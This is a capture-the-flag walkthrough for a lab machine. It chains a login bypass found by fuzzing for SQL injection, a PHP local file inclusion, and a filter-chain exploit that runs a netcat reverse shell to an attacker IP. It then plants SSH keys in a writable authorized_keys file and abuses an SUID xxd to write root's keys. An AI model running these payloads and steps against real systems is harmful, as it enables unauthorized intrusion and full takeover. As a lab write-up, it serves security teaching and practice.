nmap scan
A lot of open ports seem to be open, but since this is ctf, interesting ports was port 22 and 80
trying to open port 80 and see what is hosted there
Web-Access
after opening it on the browser, i saw a website hosted there. Firstly i tried directory listing and subdomains enumeration but nothing interesting found
so i tried to go to login page and start work on it
i intercepted a request using burb, then use sqlmap to test for sql injection
results shows that the parameter username was injectible , but sqlmap failed to exploit since it received a redirect to another page .
then i tried to use ffuf with sqlbypass wordlist from hactricks
payload:
ffuf -w login-bypass.md -X POST -u http://IP/login.php -d 'username=FUZZ&password=asdf' -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -fw 227
use any of the payload that has 302 response as a username on the login page , then you will be able to login
Getting Reverse-shell
only vulnerability cam to mind at first glace was LFI but how to get it was somehow challenging.
the application seem to accept php filters, so we can read source code of php pages using convert.base64-encode
curl -s 'http://10.10.166.133/secret-script.php?file=php://filter/convert.base64-encode/resource=secret-script.php' | base64 -d
<?php
//echo "Hello World";
if(isset($_GET['file'])) {
$file = $_GET['file'];
include($file);
}
?>this php page calls include dunction with file parameter
RCE with PHP Filters Chain
Use php filter chain to obtain RCE
first we need to generate a payload using https://github.com/synacktiv/php_filter_chain_generator
python3 php_filter_chain_generator.py --chain '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.17.4 4444 >/tmp/f"); ?>' | grep '^php' > payload.txtnow it is time to send payload as file parameter and obtain a reverse-shell
curl -s "http://10.10.166.133/secret-script.php?file=$(cat payload.txt)"User flag
After getting reverse-shell as www-data , tried to look for all users in the machine
Headed to the home directory and found only one user “comte”
time to list all directories in the in comte home directory
one of most interesting directory here is .ssh
after listing files in .ssh i found something more interesting. authorized_keys is writable :)
from here it is possible to right your own ssh key and access machine as comte
Now, generate ssh key
now copy public key to the authorized_key in comte’s home/comte/.ssh/authorized_keys then ssh as comte using id_rsa(private key)
now you can view userflag
Root Flag
Starting to check all permissions for current user
User comte has permission to run exploit.timer with root privilledge
lets locate the the file first
when locating exploit.timer i also found exploit.service , above is the content of those files
so, what exploit.timer does is it restart the service and when exploit.service restart it copies xxd to /opt and it set suid to xxd . xxd can write to files since it has suid set, can write to privileged files .
now wecan use it to write to ssh keys of root and the get root shell via ssh
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINxn9MiYjHji3FHPTZ1r9oUSSoiWB7b7kEXrlC6Fb5tT kali@kali' | xxd | /opt/xxd -r - /root/.ssh/authorized_keynow ssh as root
now you have the root flag :)
